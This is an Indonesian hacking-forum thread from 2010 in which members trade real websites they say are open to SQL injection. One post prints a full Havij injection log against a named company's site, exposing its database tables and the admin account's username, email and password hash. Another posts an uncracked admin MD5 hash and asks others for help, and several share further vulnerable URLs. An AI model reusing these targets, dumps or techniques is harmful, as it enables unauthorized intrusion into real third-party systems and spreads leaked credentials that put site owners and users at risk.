kumpulan : Vuln WEB LOKAL, Masuk Sini..

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Re: kumpulan : Vuln WEB LOKAL, Masuk Sini..

Post by JAOP » Mon Aug 23, 2010 12:41 pm

kalo website seperti ini vuln gk y ?
soal na kyknya bisa tuh , tapi kok cuma nampilin "query failed" y ?
ini website gmn ya ?
pake ASP soalny jadi binggung anne ,

mohon pencerahan :D
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Re: kumpulan : Vuln WEB LOKAL, Masuk Sini..

Post by doniskynet » Tue Aug 24, 2010 4:26 pm


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abit doang
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Re: kumpulan : Vuln WEB LOKAL, Masuk Sini..

Post by abit doang » Sat Oct 30, 2010 6:15 pm

pertama setelah up

Code: Select all

Havij 1.10 ready!
Analyzing http://www.corsamotorcycletire.com/news-detail.php?id=45
Host IP:
Web Server: Apache
Keyword Found: Achilles
Injection type is Integer
DB Server: MySQL >=5
Selected Column Count is 13

Valid String Column is 2
Target Vulnerable :D
Current DB: h83847_corsamc

Count(table_name) of information_schema.tables Where table_schema=0x6838333834375F636F7273616D63 is 19
Tables found: category_free_download,competition,contact,faq,free_download,gallery,gallery_album,partners,partners_category,subject,tire_pattern,tire_rim,tire_width,tire_world,tires,user,video,what_hot,what_hot_category
Count(column_name) of information_schema.columns Where table_schema=0x6838333834375F636F7273616D63 AND table_name=0x75736572 is 5
Columns found: id,nama,username,password,email

Count(*) of h83847_corsamc.user is 1

Data Found: [email protected]
Data Found: password=2bd2356e2a86c735e53c709e4350099bd57bd10a
Data Found: username=admin
Data Found: nama=Administrator
Data Found: id=3
dah ah, satu dulu..
Yaa ALLAH, kayakanlah kami semua, agar kami dapat berbagi lebih banyak lagi :)
dan berilah kepada kami, jodoh yg terbaik dari sisiMU.
aamiin.. :D


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Re: kumpulan : Vuln WEB LOKAL, Masuk Sini..

Post by j0ck3r » Fri Nov 05, 2010 8:11 pm

dah lama nih gak nulis...

nyumbang atu ah
http://evolitera.co.id/themes/main/prod ... uct_id=426

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Re: kumpulan : Vuln WEB LOKAL, Masuk Sini..

Post by shinichi81 » Mon Nov 08, 2010 4:05 pm

nyumbang satu euy....

Code: Select all

............make a wish............

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Re: kumpulan : Vuln WEB LOKAL, Masuk Sini..

Post by gunpermadi » Mon Nov 08, 2010 6:41 pm

pake apa nih toolsnya bos?
boleh tau dapetnya dmna?

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Re: kumpulan : Vuln WEB LOKAL, Masuk Sini..

Post by squeeze_s » Tue Nov 09, 2010 2:48 pm


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Re: kumpulan : Vuln WEB LOKAL, Masuk Sini..

Post by Nol Sembilan Tiga » Sat Nov 13, 2010 11:10 am

makin mantap aja kawan dsini..

lama gak nongol dsini...
ijin nyoba kk2 semua... :love: :love:
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Re: kumpulan : Vuln WEB LOKAL, Masuk Sini..

Post by Ang3lite » Sat Nov 13, 2010 3:42 pm

aq jg mentok ni di MD5 ma page login admin

Code: Select all

ni md5 nya 0f6e2dba23d9a3d35a465b22748cb5af yg ga dpt???

Code: Select all

ni ga dpt page adminnya

sgini dolo...
klo dah ada yg dpt bilang2 ya... :malumalu: :malumalu: :malumalu:
for my sins

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